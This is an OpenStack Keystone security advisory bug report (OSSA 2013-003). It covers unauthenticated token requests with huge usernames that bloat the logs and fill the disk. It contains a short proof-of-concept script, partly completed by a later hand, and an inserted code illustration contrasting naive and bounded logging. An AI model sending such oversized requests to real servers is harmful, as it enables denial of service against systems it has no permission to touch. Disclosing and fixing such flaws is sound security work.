[OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Identity (keystone) | Fix Released | High | Dan Prince | |
| Essex | Fix Released | High | Dan Prince | |
| Folsom | Fix Released | High | Dan Prince | |
| OpenStack Security Advisory | Fix Released | Undecided | Thierry Carrez | |
Bug Description
A remote unauthenticated keystone user could potentially fill up the disk on a Keystone server by running the following python script:
```python
from keystoneclient.v2_0 import client

PASSWORD = 'foobar'
TENANT = 'blah'
USER = '00000' * 9999999   # ~50 MB username, sent unauthenticated in the POST to /tokens
# The report is truncated after "client."; the constructor call is completed here
# with the v2.0 keystoneclient signature, and the auth_url is a placeholder.
keystone = client.Client(username=USER, password=PASSWORD, tenant_name=TENANT,
                         auth_url='http://KEYSTONE_HOST:5000/v2.0')
```
Running this script will increase the log file size by 100 MB per request. NOTE: This happens when running keystone at the default log levels:

```ini
# verbose = False
# debug = False
```
Version-Release number of selected component (if applicable):
openstack-
How reproducible:
*always*
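The log-growth mechanism described in the report, as an added illustration that is not Keystone's code and not part of the original bug: a handler that writes the entire failed request body to the log, beside one that bounds every user-controlled field before logging. The request shape, the 64-byte cap, the handler names and the in-memory log stream are assumptions made for this example; it measures how many bytes one unauthenticated request adds to the log in each case and does not reproduce the actual Keystone fix.

```python
"""Added illustration (not Keystone's code): log growth caused by an
oversized username in an unauthenticated token request, naive vs. bounded
logging. Everything here is constructed for the example."""
import io
import json
import logging

# Same shape as the reporter's USER string: 5 * 9_999_999 bytes (~50 MB).
OVERSIZED_LEN = 5 * 9_999_999
MAX_FIELD_LOG_LEN = 64  # assumed cap on any user-controlled field in a log line


def build_request(username_len):
    """Constructed v2.0-style token request carrying a username of username_len bytes."""
    return {
        "auth": {
            "tenantName": "blah",
            "passwordCredentials": {"username": "0" * username_len, "password": "foobar"},
        }
    }


def _make_logger(name):
    """Logger writing to an in-memory buffer so the bytes written can be measured."""
    stream = io.StringIO()
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    return logger, stream


def naive_handle(request):
    """Vulnerable pattern: log the whole failed request body at INFO.
    Nothing is authenticated first, so the bytes logged are proportional to
    attacker-supplied input. Returns the number of bytes written to the log."""
    logger, stream = _make_logger("naive")
    logger.info("Authentication failed for request %s", json.dumps(request))
    return len(stream.getvalue().encode())


def truncate(value, limit=MAX_FIELD_LOG_LEN):
    """Cap a user-controlled string for logging, recording its true length."""
    if len(value) <= limit:
        return value
    return value[:limit] + "...(%d bytes)" % len(value)


def bounded_handle(request):
    """Hardened pattern: log only bounded, non-secret fields.
    Returns the number of bytes written to the log."""
    logger, stream = _make_logger("bounded")
    auth = request.get("auth", {})
    creds = auth.get("passwordCredentials", {})
    username = truncate(str(creds.get("username", "")))
    tenant = truncate(str(auth.get("tenantName", "")))
    logger.info("Authentication failed for user %r in tenant %r", username, tenant)
    return len(stream.getvalue().encode())


if __name__ == "__main__":
    request = build_request(OVERSIZED_LEN)
    print("naive logging, bytes per request:  ", naive_handle(request))
    print("bounded logging, bytes per request:", bounded_handle(request))
```

With the full-size username the naive handler writes on the order of 50 MB per request while the bounded one writes a fixed-size line, which is the difference between an unauthenticated client being able to fill the disk and not; the check to look for in any auth endpoint is whether anything derived from the request body reaches a log line before the request has been validated and size-limited.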
information type: Private Security → Public Security
Changed in keystone: status: In Progress → Fix Committed
Changed in keystone: status: Fix Committed → Fix Released
Changed in keystone: milestone: grizzly-3 → 2013.1
summary: unauthenticated POST to /tokens can fill up disk/logs → [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs
Changed in ossa: assignee: nobody → Thierry Carrez (ttx)
Changed in ossa: status: New → Fix Released
Keystone-core, please review proposed patches (only comment on the private bug please).
@Dan: would that also affect Essex?